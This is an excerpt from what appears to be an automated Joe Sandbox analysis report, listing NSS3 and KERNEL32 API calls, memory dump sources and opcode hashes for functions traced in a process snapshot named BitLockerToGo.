                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6B09B3,0000001A,?), ref: 6C6B08E9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C6B08FD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C6B0939
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6B0953
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2572351645-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3315a3adb7fe4e4094f04540d214c6022790e4e9f9ca1a9a037355c91d90eead
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED0126F1A0934A3BFB14AB359D10B673B989F41358F00503AFC2AD6A01FB31E4248B9D
                                                                                                                                                                                                                                                                                                                                                          Function 6C6949C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3 ref: 6C694A10
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(6C68781D,?,6C67BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C694A24
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C67BD28,00CD52E8), ref: 6C694A39
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C67BD28,00CD52E8), ref: 6C694A4E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3904631464-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bdd1ce063895b33cd0c3f43cb2bc56abf93b6408c174760acde80ab14ea1c20
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4940c800f98e294cdb2fe3626484fed23a8fae159b4201ba107427b08d4c47ae
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdd1ce063895b33cd0c3f43cb2bc56abf93b6408c174760acde80ab14ea1c20
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 912130756056018FDB00AF79D18457ABBF4FF46358F014969D8999BB01E730D844CB99
                                                                                                                                                                                                                                                                                                                                                          Function 6C668DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c99df8dae17f1eb23d3d851509071520fd8649dd974b36308b2e134e2f996702
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 417ba4ecff019fb6497b39519250b81821829cfbb66e3591a24bc9dc26620f47
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c99df8dae17f1eb23d3d851509071520fd8649dd974b36308b2e134e2f996702
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC1191716096009FD700AF79D44819ABBF4FF4A354F01496ADC88D7B00EB30E855CBD6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6EAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C6D5F17,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EAC94
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C6D5F17,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EACA6
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EACC0
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EACDB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3a2f4c525f32834d09128abd0bc301437389e9b6c8e269fcf06cb9c223d3cb32
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4dac37b4ff56d7f355ac360ab2dbd31bc62a3c1bb401c88d94d9b1bfd20f8438
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a2f4c525f32834d09128abd0bc301437389e9b6c8e269fcf06cb9c223d3cb32
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE014CB1602B019BEB50DF29D908753BBF8FF04B59B50483AD85AC3A01E731F455CB99
                                                                                                                                                                                                                                                                                                                                                          Function 6C651DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C651DFB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: TlsGetValue.KERNEL32(00000000,?,6C6600D2,00000000), ref: 6C6495D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: EnterCriticalSection.KERNEL32(?,?,?,6C6600D2,00000000), ref: 6C6495E7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: PR_Unlock.NSS3(?,?,?,?,6C6600D2,00000000), ref: 6C649605
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C651E09
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_EnterMonitor.NSS3(?,?,6C64E175), ref: 6C64E19C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_EnterMonitor.NSS3(6C64E175), ref: 6C64E1AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_ExitMonitor.NSS3 ref: 6C64E208
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PL_HashTableRemove.NSS3(?), ref: 6C64E219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C64E231
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C64E249
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_ExitMonitor.NSS3 ref: 6C64E257
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C651E37
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C651E4A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 499896158-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d825234abd6fede2abae59bff99e313f8ea69ca645e4232965fa19760336aab
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2421a5d70e7c0f02ad82dc23f53ee102019fd533ea4bba0d7fa869026d3ebe2d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d825234abd6fede2abae59bff99e313f8ea69ca645e4232965fa19760336aab
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA012671B4015197EB009F69EC08F4A77B4AB42B4CF714031E9299BB90E731E836CBD9
                                                                                                                                                                                                                                                                                                                                                          Function 6C651D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C651D75
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C651D89
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C651D9C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C651DB8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 939066016-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea1d833c1d06456501370f38d630067eb84e5f81d98db1f24bcc7201fd621c8d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d764a7dea8b6073729df369b9eb279f3d1be287225ceb3c3e714be1b1376a340
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea1d833c1d06456501370f38d630067eb84e5f81d98db1f24bcc7201fd621c8d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0F9B360521067FF102E599C41B8776D8AB85798F700335DD194BB40D760E81586EE
                                                                                                                                                                                                                                                                                                                                                          Function 6C6988E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6C6A08AA,?), ref: 6C6988F6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C6A08AA,?), ref: 6C69890B
                                                                                                                                                                                                                                                                                                                                                          • PR_NotifyCondVar.NSS3(?,?,?,?,?,6C6A08AA,?), ref: 6C698936
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C6A08AA,?), ref: 6C698940
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 959714679-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b76de75e6d008b3c04339c0ff21078ab008df6a71939c0a9e79c8f88c4e41575
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7d57c2957aaec200f688c12527046a921b35d88c38c97a0e5a80b8b3a8fc2f97
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b76de75e6d008b3c04339c0ff21078ab008df6a71939c0a9e79c8f88c4e41575
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F0184746046069FDB00AF3DC084659B7F4FF0A398F01066AE89987B10E734E894CBD6
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2F88,6C6D0660,00000020,00000000,?,?,6C6D2C3D,?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D0860
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C6D2C3D,?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D0874
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C6D0884
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C6D08A3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2502187247-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e4d004a4d9041f7a67f0b73f0f68fe081f7a49673940ded1e0d2f44ced07e476
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7e7b2dc36a26abc46190726c7ffe755ec94d8364e2c59c893cf3bb22bbbdd2bc
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4d004a4d9041f7a67f0b73f0f68fe081f7a49673940ded1e0d2f44ced07e476
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5012B75A00284ABEF002F65FC4495D7B38DB5B31EF190175FC0C52A02EF21A49487E9
                                                                                                                                                                                                                                                                                                                                                          Function 6C75CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f299487198e86ae79cbea0ec4bf17a5099320efda04e5b489e2925e5eaa6227
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6f79a401c65683a9705b038b2654255cf0e0dba2ba71524d02c4f6b8cfa9f1d6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f299487198e86ae79cbea0ec4bf17a5099320efda04e5b489e2925e5eaa6227
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E030767006089BCE10EFA8DC4488677ACEF4A2717150565E691C3700D231F905CBA1
